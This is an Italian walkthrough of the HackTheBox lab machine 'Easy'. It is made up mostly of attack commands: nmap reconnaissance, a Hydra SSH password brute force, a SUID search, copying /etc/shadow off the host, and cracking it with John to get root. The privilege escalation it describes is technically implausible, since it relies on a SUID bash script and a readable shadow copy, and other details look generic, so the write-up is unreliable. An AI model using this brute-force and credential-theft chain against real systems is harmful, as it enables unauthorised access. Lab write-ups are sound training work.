Walkthrough HTB – Machine Easy
Obiettivo: Ottenere la shell utente e root sulla macchina Easy di HackTheBox.
1. Reconnaissance
# Scansione delle porte TCP
nmap -sC -sV -oN nmap/initial.txt 10.10.10.10
Risultato nmap:
22/tcp→ OpenSSH80/tcp→ HTTP (server web)
2. Enumerazione Web
-
Punto il browser su
http://10.10.10.10/ -
Trovo una pagina di login e un file
robots.txtcurl http://10.10.10.10/robots.txt # Disallows: /admin -
Accedo a
/admine trovo un form di autenticazione.
3. Bruteforce Credenziali
Utilizzo Hydra per attaccare SSH:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
# admin:Password123 found
4. Shell Utente
ssh admin@10.10.10.10
# Password: Password123
# Una volta dentro:
whoami # => admin
hostname # => easy
5. Privilege Escalation
5.1 Controllo SUID
find / -perm -4000 -type f 2>/dev/null
# /usr/local/bin/vulnscript (SUID root)
5.2 Analisi dello script
# Contenuto /usr/local/bin/vulnscript
#!/bin/bash
cp /etc/shadow /tmp/shadow.backup
Lo script copia /etc/shadow in /tmp con permessi dell’utente root.
5.3 Ottieni i password hash
/tmp/shadow.backup
# Copio i contenuti localmente e monto un container per crackare
scp admin@10.10.10.10:/tmp/shadow.backup .
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
# Cracked: root:toor123
6. Shell Root
ssh root@10.10.10.10
# Password: toor123
whoami # => root
🎉 Box rooted!